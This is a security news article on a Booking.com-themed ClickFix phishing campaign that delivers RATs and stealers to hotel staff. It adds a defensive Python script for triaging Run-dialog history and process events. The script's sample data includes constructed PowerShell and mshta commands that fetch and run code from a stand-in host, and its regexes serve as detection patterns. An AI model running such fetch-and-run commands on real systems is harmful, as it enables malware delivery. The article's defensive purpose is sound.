An attack chain diagram for a typical sample in this campaign | Image: Cofense
According to Cofense Intelligence, a sophisticated and evolving phishing campaign is using spoofed Booking.com emails and fake CAPTCHA websites, a technique known as ClickFix, to deliver remote access trojans (RATs) and information stealers to victims in the hotel and travel industry.
The campaign, active since November 2024, has grown rapidly: 47% of all activity observed to date fell in March 2025 alone. Cofense reports:
"These campaigns are notable for delivering a wide variety of remote access trojans (RATs) or information stealers via an embedded link to a fake CAPTCHA site that delivers a malicious script instead of a verification code."
The attack tricks recipients into executing a PowerShell command disguised as a CAPTCHA verification step. Known as ClickFix, the technique uses the Windows Run dialog and keyboard shortcuts to paste and launch the command, so the victim never opens an attachment or a downloaded file; the pasted command does the rest.
The email lures are carefully tailored to exploit the pressure and professionalism of hotel staff. Examples include:
- Vague “incident reports” directed to unnamed “partners”
- Fake guest complaints implying reputational damage and threatening 24-hour deadlines
- Fabricated booking confirmations with guest names and specific requests
These pressure tactics push recipients to click the embedded links, which redirect them to the ClickFix pages.
"75% of all active threat reports (ATRs) with fake CAPTCHAs used Booking.com-spoofing ClickFix templates," Cofense notes.
The malware delivered via these campaigns includes:
- XWorm RAT: the most common payload, seen in 53% of attacks
- Pure Logs Stealer: present in 19% of samples
- DanaBot: seen in 14%
- ConnectWise RAT: in select campaigns
Some samples deliver multiple payloads at once. Cofense highlights: "11% of campaign ATRs were seen delivering both RATs and information stealers."
These threats enable remote system access, credential theft, and data exfiltration across compromised endpoints.
ClickFix pages use JavaScript to copy a PowerShell command into the user's clipboard, then instruct the victim to:
- Press Windows Key + R
- Press Ctrl + V (to paste the script)
- Hit Enter to execute
To make the command look innocuous, attackers append a fake verification code as a comment at the end of the script. The Run box is a single-line field that shows only the tail of a long paste, so the victim sees the comment rather than the command that precedes it:
"When pasted into a Run command window… only the comment's 'verification code' is visible," explains Cofense.
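The paste-and-run flow above leaves two artifacts a defender can check: Windows records what was typed into the Run dialog under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU (one value per entry, ending in a literal "\1", with MRUList giving recency order), and the pasted command starts as a child process of explorer.exe. The Python triage script below is an added example, not Cofense's tooling. It works on constructed RunMRU strings and a hypothetical process-creation record, reads nothing from a live registry, and the regexes, the 40-character visible-width figure, the example.invalid URLs and the sample commands are all assumptions for illustration.

```python
"""Triage Run-dialog history and process events for ClickFix paste-and-run.

Added example (not Cofense's code). Assumptions: RunMRU values are the raw
REG_SZ strings Windows stores (each ends in "\\1", MRUList gives recency
order), the Run box shows roughly the last 40 characters of a long paste,
and the sample data below is constructed, not real telemetry.
"""
import re

RUN_BOX_VISIBLE_CHARS = 40  # assumed single-line edit-box width, for illustration

# Script hosts / downloaders that ClickFix commands typically start (heuristic list).
LAUNCHERS = re.compile(
    r"^\s*(powershell|pwsh|mshta|cmd|curl|certutil|bitsadmin)(\.exe)?\b", re.I)
# Hidden-window, policy-bypass, encoded-command and download-and-execute traits.
SUSPICIOUS_FLAGS = re.compile(
    r"(-w(indowstyle)?\s+h(idden)?|-nop(rofile)?\b|-e[px](ecutionpolicy)?\s+bypass"
    r"|-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}|\biex\b|invoke-expression"
    r"|downloadstring|invoke-webrequest|\biwr\b|\birm\b|invoke-restmethod)", re.I)
# Words the decoy comment uses to look like a CAPTCHA result.
DECOY_WORDS = re.compile(r"(verif|captcha|robot|human|code|id\b)", re.I)


def strip_runmru_suffix(value: str) -> str:
    """RunMRU data ends in a literal backslash-1; drop it to get what was typed."""
    return value[:-2] if value.endswith("\\1") else value


def visible_tail(cmd: str, width: int = RUN_BOX_VISIBLE_CHARS) -> str:
    """Approximate what the Run box displays after a paste: the caret sits at
    the end of the line, so only its last `width` characters are in view."""
    return cmd if len(cmd) <= width else cmd[-width:]


def split_trailing_comment(cmd: str):
    """Split at the first '#' outside single/double quotes (PowerShell comment).
    Returns (code, comment); comment is '' when there is none."""
    quote = None
    for i, ch in enumerate(cmd):
        if quote:
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch == "#":
            return cmd[:i].rstrip(), cmd[i:]
    return cmd, ""


def score_command(cmd: str):
    """Return the list of ClickFix traits found in one command line."""
    reasons = []
    code, comment = split_trailing_comment(cmd)
    if LAUNCHERS.search(code):
        reasons.append("launches a script host or downloader")
    if SUSPICIOUS_FLAGS.search(code):
        reasons.append("hidden/bypass/encoded/download-and-execute flags")
    if comment and DECOY_WORDS.search(comment):
        reasons.append("trailing comment reads like a verification code")
    if len(comment) >= RUN_BOX_VISIBLE_CHARS:
        reasons.append("only the decoy comment would be visible in the Run box")
    return reasons


def triage_runmru(values: dict):
    """Walk RunMRU in MRUList (most recent first) order and flag entries with
    two or more traits. Returns [(value_name, command, reasons), ...]."""
    findings = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is None:
            continue
        cmd = strip_runmru_suffix(raw)
        reasons = score_command(cmd)
        if len(reasons) >= 2:
            findings.append((name, cmd, reasons))
    return findings


def is_clickfix_process_event(parent_image: str, command_line: str) -> bool:
    """Win+R launches are children of explorer.exe. Given the ParentImage and
    CommandLine fields of a process-creation event (Sysmon event 1 naming),
    alert when explorer spawned a command carrying two or more ClickFix traits."""
    if not parent_image.lower().endswith("\\explorer.exe"):
        return False
    return len(score_command(command_line)) >= 2


# Constructed sample RunMRU export: one benign shortcut, one benign PowerShell
# use, one Booking.com-style ClickFix paste, one mshta variant. Not real data.
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "powershell -c Get-Date\\1",
    "c": ("powershell -w hidden -nop -c \"iex (iwr 'https://example.invalid/check')\""
          " # 'I am not a robot - reCAPTCHA Verification ID: 7612'\\1"),
    "d": "mshta https://example.invalid/verify.hta # Verification code: 4411\\1",
}

if __name__ == "__main__":
    for name, cmd, reasons in triage_runmru(SAMPLE_RUNMRU):
        print(f"[{name}] victim saw: ...{visible_tail(cmd)!r}")
        print(f"    executed:   {cmd}")
        for r in reasons:
            print(f"    - {r}")
```

Running the script prints, for each flagged entry, the 40-character tail the victim saw in the Run box next to the full command that actually ran, which makes the comment trick concrete. The two-trait threshold keeps ordinary `powershell -c Get-Date` use out of the findings; tune the regexes to your environment, and treat `is_clickfix_process_event` as a starting point for a process-creation rule rather than a finished signature.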
While Booking.com-themed fake CAPTCHAs dominate, new variations have emerged:
- Cloudflare Turnstile-spoofing templates
- Cookie consent banner-themed ClickFix sites prompting script execution under the guise of "accepting cookies"
These evolving tactics indicate that attackers are actively testing new pretexts to broaden their target base.
As attackers continue to iterate on ClickFix and RAT-laden phishing, the practical defenses are user awareness (no legitimate CAPTCHA asks you to press Win+R and paste a command), restricting the Run dialog where the business allows it, and alerting on script hosts such as powershell.exe or mshta.exe spawned by explorer.exe with hidden-window or download-and-execute arguments, alongside layered endpoint protection.